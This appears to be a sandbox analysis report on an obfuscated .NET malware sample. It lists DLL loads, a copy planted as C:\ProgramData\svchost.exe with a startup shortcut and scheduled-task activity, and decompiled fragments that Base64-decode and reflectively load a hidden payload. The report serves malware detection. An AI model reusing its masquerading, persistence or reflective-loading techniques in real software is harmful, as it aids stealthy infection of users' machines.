                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: mscoree.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: apphelp.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: version.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: sspicli.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: mscoree.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: version.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: sspicli.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: mscoree.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: version.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: sspicli.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: mscoree.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: version.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: sspicli.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: mscoree.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: version.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: sspicli.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\ProgramData\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: svchost.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\svchost.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: a9YMw44iQq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: a9YMw44iQq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Bf13MrTgh7zf0ag.Lh8GzADz2j4ZQkS,Bf13MrTgh7zf0ag._4nfLLiUt18bOWVH,Bf13MrTgh7zf0ag.HomGWmyDc17u8TP,Bf13MrTgh7zf0ag.HP1tDCpCJvlUuRV,Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd._8OlI7FzhlSYcSzFdJ2FkA6c4Rio0oxPq()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{x3EX8lfA5Ha54rtNPGbXy8v1pYCK1McwisfMsWm6rQA2ly4[2],Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.LUYVjXWCttsIfBLLOpt644yOSP0XH1xl(Convert.FromBase64String(x3EX8lfA5Ha54rtNPGbXy8v1pYCK1McwisfMsWm6rQA2ly4[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { x3EX8lfA5Ha54rtNPGbXy8v1pYCK1McwisfMsWm6rQA2ly4[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Bf13MrTgh7zf0ag.Lh8GzADz2j4ZQkS,Bf13MrTgh7zf0ag._4nfLLiUt18bOWVH,Bf13MrTgh7zf0ag.HomGWmyDc17u8TP,Bf13MrTgh7zf0ag.HP1tDCpCJvlUuRV,Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd._8OlI7FzhlSYcSzFdJ2FkA6c4Rio0oxPq()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{x3EX8lfA5Ha54rtNPGbXy8v1pYCK1McwisfMsWm6rQA2ly4[2],Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.LUYVjXWCttsIfBLLOpt644yOSP0XH1xl(Convert.FromBase64String(x3EX8lfA5Ha54rtNPGbXy8v1pYCK1McwisfMsWm6rQA2ly4[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { x3EX8lfA5Ha54rtNPGbXy8v1pYCK1McwisfMsWm6rQA2ly4[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs.Net Code: tzIwe855hkZVfy7N3N16Mzc4y7JQSTMeDbxwLesPqgFr2De System.AppDomain.Load(byte[])
                      Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs.Net Code: iV7TY5oCiEBfS9wg8yushOLiETmekrC5O6iKh5hV5Po09VW System.AppDomain.Load(byte[])
                      Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs.Net Code: iV7TY5oCiEBfS9wg8yushOLiETmekrC5O6iKh5hV5Po09VW
                      Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs.Net Code: tzIwe855hkZVfy7N3N16Mzc4y7JQSTMeDbxwLesPqgFr2De System.AppDomain.Load(byte[])
                      Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs.Net Code: iV7TY5oCiEBfS9wg8yushOLiETmekrC5O6iKh5hV5Po09VW System.AppDomain.Load(byte[])
                      Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs.Net Code: iV7TY5oCiEBfS9wg8yushOLiETmekrC5O6iKh5hV5Po09VW
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeCode function: 0_2_00007FFD3488BEF5 push eax; retf 0_2_00007FFD3488BF2D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3478D2A5 pushad ; iretd 2_2_00007FFD3478D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348A09D8 push E85D5F5Dh; ret 2_2_00007FFD348A09F9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3479D2A5 pushad ; iretd 5_2_00007FFD3479D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD3477D2A5 pushad ; iretd 8_2_00007FFD3477D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD3478D2A5 pushad ; iretd 11_2_00007FFD3478D2A6
                      Source: C:\ProgramData\svchost.exeCode function: 16_2_00007FFD348B00BD pushad ; iretd 16_2_00007FFD348B00C1
                      Source: C:\ProgramData\svchost.exeCode function: 17_2_00007FFD348B00BD pushad ; iretd 17_2_00007FFD348B00C1
                      Source: C:\ProgramData\svchost.exeCode function: 19_2_00007FFD348B00BD pushad ; iretd 19_2_00007FFD348B00C1
                      Source: a9YMw44iQq.exe, zMKBkijdWFRYxIMXTaYx0kSiNqDvrPtC.csHigh entropy of concatenated method names: 'Lw8UB3IX5V1miaVjgD0tGALkI7UAlT8n', 'OfylzWNZBWuGK4jjHivwl5H0mHAPXv4h', 'al0GQ3oCXiyfe55qzZHr3j44azBU7khh', 'itrXAtZGog8ACyWsXPIOPXfZr88v5xDnyI95fSPY861tZc6G2oif8t7f8', '_0uwu8i1OCOnhUsXXl7EAjMgGL8GwLyYdCe7Hg1g0Tgp2C6qrhdVY5DoNZ', 'XTMpKqRmWLZtcLcZTwyCb1EbOpWRhW4ONA3IoMrcIVlhVpyQQpF12btiR', 'kjIdsWc0D4cfpch8Jaje2CAkTfF93koQCidYMiVvLeMc8EfwzEogNzT6i', '_95KhGU6BlcEWK2gR2BUHcMW6VQxFbyH9exAZlWpR0fMVnQtE7Bf8v7eCl', 'sHpO1jo7wHXzZEyuROtGVqIxqebLOb9FatJd9ACfW6T1cPNLo2F0HU40F', 'bpThypL9MgwhTeocE5VtNF5OSeud3XT558LyC2odonZT5R32bBgGyVLaf'
                      Source: a9YMw44iQq.exe, Bf13MrTgh7zf0ag.csHigh entropy of concatenated method names: 'QxiOb7WzUjUksbZSLhXv2GQEq0ed1KbKWsn15zE8FvYBkwZcwpGeP9GvMuYMu29r2O9vrGQNPknvT7shY5YJ5y58v3udkXQh2', 'DIeaGU8ZZH3COVVfMDmEBnzWz2DfYpfxTt7xBTMl4oWtk8abrUHg1d1PO9SO4eW7IOHNT5tqEBV6VXuuBOgnWQkSlVfi0Iejd', 'C4hs2L7cZjbI5QKlQFWB0B4s1YlQaR1TjaHnMvuDwmrYEjRUSiRt6sLLPR85cDi45maXNlzqG8wNvw1yCy3puoAxgRp2fGPYg', 'qIIMLIiqtFvBW3G0gCm7bNtk5cM9cNctA5k2RaYcrDD2zVqqqfWZmaYFbZB1LHGxWJvKXlVBT1QoGtZpryxezEmVT3wOPOpaE'
                      Source: a9YMw44iQq.exe, JaFabquuELSuh5D.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'jXg1ZrABHfC9wKJq5J9yq4PzeKc2fHEBvF3xzf3XLpcVX0EM63qZR4RDltfCyOEn9', 'f7FdaLZok1L2wzlzJ0NBM6ZptNK1Vy7kmhh2D0jE125yNdDY7bJOJ1WvxWrOM4IjG', 'ZdZ4TZHXmcPA0JlpxHJuZi9dKbjAPWaZvpCIEXNmF6QOTx7ewwApY5yzt7gZY0zKf', '_76aUG2KXWXlLFEQoKiJEidfhImp69uTu4rxYR7SrxYztzKMW2dLj1IjsN4w7JlUSmk7pSHY4bcyr8MeuBBtyCDkzB5x6QXTsb'
                      Source: a9YMw44iQq.exe, CAKqia57kooc5P6Nhx6x0okYjQzUptMk.csHigh entropy of concatenated method names: 'xBASX7lsOJPU9Cck3kZ3o0qmLTAKuKrP', 'sGti6y5kLLjB4EZ2GKrqrV0zU', 'GsE9pLcip9MzANzPi5jppj9En', 'N6Q3SCv1YsLsr7H5DlyFIeDon', 'V6mV7RWu45SpqDfgnupk8TqiR'
                      Source: a9YMw44iQq.exe, KTFdTAhBe0nkVRO.csHigh entropy of concatenated method names: 'Ac4uCzowotVAxeR', 'CBIihYpQadKB8KR', 'LzcKodkO0YBRvWP', 'OWqjciiKxuUIGMm', '_9xG6KQALPjaqxhT', 'veIBr5aKy0PJKi5', 'l6kAhdELfITzeJt', '_4ePiXFPx09SA1Vv', 'LVyky0svxDcPkam', 'XkNC0OhUGP0IEKK'
                      Source: a9YMw44iQq.exe, xeujlJtakKMAZOjK0ur1WybEECxkXkut0zpG8ZNNqdLn0AX.csHigh entropy of concatenated method names: '_5aithjmI9LoLLPCiBILSlDH2d0kCQKXrMaEE5WJnq8Tv7Qp', 'MM7LW2HKoAitYgsdpjEATIqjAb0mwW0BBlvYMkhE7P10poq', 'QAbhGR8dNrSBTMQK0Yqav3jjG5ysRg32lWFoSxLIPma5gYP', '_0wUqk1OaVerqBQX3Y4EoWNEL1Gl2waveV0V6Gg77S9aATZP', 'Qdwp8hUnVeraABh1MLfyU5mz3arAdmAdd1aCcEk2Tl8TJDv', 'FZ2QI9XpgmmMWz11hK1DdH2zT62STcMbsDyZy4pm6rmtl3V', 'ACWqANoKGPn3bKLHCSH40rEahGuzJT1dxGB90nSsmjjylxv', 'pX8tVB0L5xZb2vb2dxPDe1rzEaM7wuaJwTZOCpk0aNdrtBw', 'fjhBRY1HMysdHfZcKmMXulYG8GDoyl12', 'McPQuVJNZQbtu65AyEQVTybL4WCB5cLo'
                      Source: a9YMw44iQq.exe, 7G7PfuLETnOvbfIE7xucZO8XNTqvLqOJlbqtNQJY3lKmGbm.csHigh entropy of concatenated method names: 'DFCpCujzH36d3cngc34zOQoWzQTdK0myzc7qWpsXWNu21Jb', '_587FBEMOsxviTwCKL7yBbWITHUJ3bujt3wiySDVhRy1yxGt', 'uJohSukkbCa7xsGg2Qp44GPZQCpKe32xc2O2QcGU1Q6CEvS', 'Uq58pQq8xlhaYn5Y9Bk3mrYZu', 'Ct5qYzPDfKw8LQTboboAX4hNv', 'qwBAPgrRPhdIqDHwAhXvN1hRq', 'nxduhCDsny5h3nBj2HrQsA3c1', 'jEaCh8yFqsVsZ93zdOX0nzFV8', 'ONz3wVxNhiXm2TtIiy580HIt8', 'VZ6rHUWHhThtCv7iyZtPjrFZg'
                      Source: a9YMw44iQq.exe, a0V5Zu6qlCMa06Q58DDhmURzmiMHtcd8kRscBWhcnJuQRjG.csHigh entropy of concatenated method names: 'jsYQiieE5aJ2jVwkXoxTSDWNphs6FAdVea24JiK6uxKGCZb', 'jvKVB8DMwRz9tgL1u0gNFSayI', 'FiiYcV3QUeyJyPiuXtFFLojQQ', '_4QTl9xaX3tWNxWuQRadqrMU6o', '_75GUCFNKwqLz6HmYfEL0DmkY1'
                      Source: a9YMw44iQq.exe, Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.csHigh entropy of concatenated method names: 'FMEE0DIkQDvLYM2Z4yz5Tjo5b5eLEuEI', 'jObZkjuGMhwEiPBfwOmsbOrrZXZmrCeZ', 'bk6xBVPwDLAsH9U1hF1haOabJtpvpGFf', 'IshekKslk6IjxnwmSRXRoHe4GAZv2VRl', 'GIs7dhgV0OPXyxFk6TOoHoDWhv8zemsT', 'ze8Iw4Nb7Z7m1Yb66vRbWQWrAsUFPxzJ', 'UvurS3nxIHoiBM88BrHYzPx81ufHUZkd', 'swIqkQW0BTghnqNG2wFoKjkNf068bLuM', '_2414yadJg26i5vSrWjNNjeYpa4szCoAz', 'lW6mYbJTX1vQ7vHCEMrrPebmTotc5GJY'
                      Source: a9YMw44iQq.exe, EzYl9iqHKPGiGyI.csHigh entropy of concatenated method names: 'aP04aVJcS3soVLg', 'jobvqCGSO8bCpy3', 'OByK2z0r02mouhE', '_4I2j7ymc4y48Bup', 'MpaJfH3REaG3a2T', 'PeHeSMfcm6QgPRH', '_06w8NyFQYcs5BnZ', 'LJVYU95Gv9cQfMq', 'jDk0XayV147rHNd', 'csYJbTrZgHGnH53'
                      Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.csHigh entropy of concatenated method names: 'MNtS90o1HKWpwjmtlvO903GbNTByocWwLd7yyIZn6Q4ZtXK', 'tzIwe855hkZVfy7N3N16Mzc4y7JQSTMeDbxwLesPqgFr2De', 'k2x8Jncr7poTh7SyXKLhwBvqXviBc7HReEzrmXDNeueIj4R', 'wgDXMbPi6ZUBuZgeleKoQmPFcJwxyeFiCLlifHYgdhR0kc7', 'p38ACEv6I0M4R7dcFane6uBzs7RWaUJ9l5lCftfrOLZHjWg', 'lHKkwUzolK1oj4q73uwvSeNCO9BIzUcyRC2wJ4WagDWhbfa', '_5AFeAlHwXQJYUYqjS4jFcrE5EzKlM0aFnRQpSNnCeTUN6eE', '_82o2RiaQ2aGLU4TurZxmJUMkxwaoX6pdrgWihYO1RGfhj50', 'jDnkgKOMiZiOTgqeOCX5BUDS3xxH5oN9D1nr4XpUx1AU8Rf', 'qJsGITEdu1leqjdiZJFhkC1OAKNXz9CA0lm9WH1MwNzOsHq'
                      Source: a9YMw44iQq.exe, lwW1zcF0pcqJbKLsstMtGHZdM9caYfdk.csHigh entropy of concatenated method names: 'l7fCYY3hc0ERgtj8l2K7qTWgPUDKEQSU', 'bS9VEFiDBIgkPYTtej3kDHMXOhc0vH1s', '_3rpjR4YrSy5LkzuZ6z3xtf0c6UG2bZn9', 'zCgKRcmv0rfANyVcOzIiznvJFtvCa578', 'YSoW1FxgADijTplK7zUzpfaDA', '_2Ps92OUWolTdyV0IUdBqYGalt', 'plj2ugHMesPs6bv2tYUVwp2QD', '_2sjEZEKIzfsvSQGXaY0jAyQhN', 'ewIb0YUwF52UsD1qEVkA5tgsF', 'oGza4w5ImtYazv7CV4rdJUC9v'
                      Source: svchost.exe.0.dr, zMKBkijdWFRYxIMXTaYx0kSiNqDvrPtC.csHigh entropy of concatenated method names: 'Lw8UB3IX5V1miaVjgD0tGALkI7UAlT8n', 'OfylzWNZBWuGK4jjHivwl5H0mHAPXv4h', 'al0GQ3oCXiyfe55qzZHr3j44azBU7khh', 'itrXAtZGog8ACyWsXPIOPXfZr88v5xDnyI95fSPY861tZc6G2oif8t7f8', '_0uwu8i1OCOnhUsXXl7EAjMgGL8GwLyYdCe7Hg1g0Tgp2C6qrhdVY5DoNZ', 'XTMpKqRmWLZtcLcZTwyCb1EbOpWRhW4ONA3IoMrcIVlhVpyQQpF12btiR', 'kjIdsWc0D4cfpch8Jaje2CAkTfF93koQCidYMiVvLeMc8EfwzEogNzT6i', '_95KhGU6BlcEWK2gR2BUHcMW6VQxFbyH9exAZlWpR0fMVnQtE7Bf8v7eCl', 'sHpO1jo7wHXzZEyuROtGVqIxqebLOb9FatJd9ACfW6T1cPNLo2F0HU40F', 'bpThypL9MgwhTeocE5VtNF5OSeud3XT558LyC2odonZT5R32bBgGyVLaf'
                      Source: svchost.exe.0.dr, Bf13MrTgh7zf0ag.csHigh entropy of concatenated method names: 'QxiOb7WzUjUksbZSLhXv2GQEq0ed1KbKWsn15zE8FvYBkwZcwpGeP9GvMuYMu29r2O9vrGQNPknvT7shY5YJ5y58v3udkXQh2', 'DIeaGU8ZZH3COVVfMDmEBnzWz2DfYpfxTt7xBTMl4oWtk8abrUHg1d1PO9SO4eW7IOHNT5tqEBV6VXuuBOgnWQkSlVfi0Iejd', 'C4hs2L7cZjbI5QKlQFWB0B4s1YlQaR1TjaHnMvuDwmrYEjRUSiRt6sLLPR85cDi45maXNlzqG8wNvw1yCy3puoAxgRp2fGPYg', 'qIIMLIiqtFvBW3G0gCm7bNtk5cM9cNctA5k2RaYcrDD2zVqqqfWZmaYFbZB1LHGxWJvKXlVBT1QoGtZpryxezEmVT3wOPOpaE'
                      Source: svchost.exe.0.dr, JaFabquuELSuh5D.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'jXg1ZrABHfC9wKJq5J9yq4PzeKc2fHEBvF3xzf3XLpcVX0EM63qZR4RDltfCyOEn9', 'f7FdaLZok1L2wzlzJ0NBM6ZptNK1Vy7kmhh2D0jE125yNdDY7bJOJ1WvxWrOM4IjG', 'ZdZ4TZHXmcPA0JlpxHJuZi9dKbjAPWaZvpCIEXNmF6QOTx7ewwApY5yzt7gZY0zKf', '_76aUG2KXWXlLFEQoKiJEidfhImp69uTu4rxYR7SrxYztzKMW2dLj1IjsN4w7JlUSmk7pSHY4bcyr8MeuBBtyCDkzB5x6QXTsb'
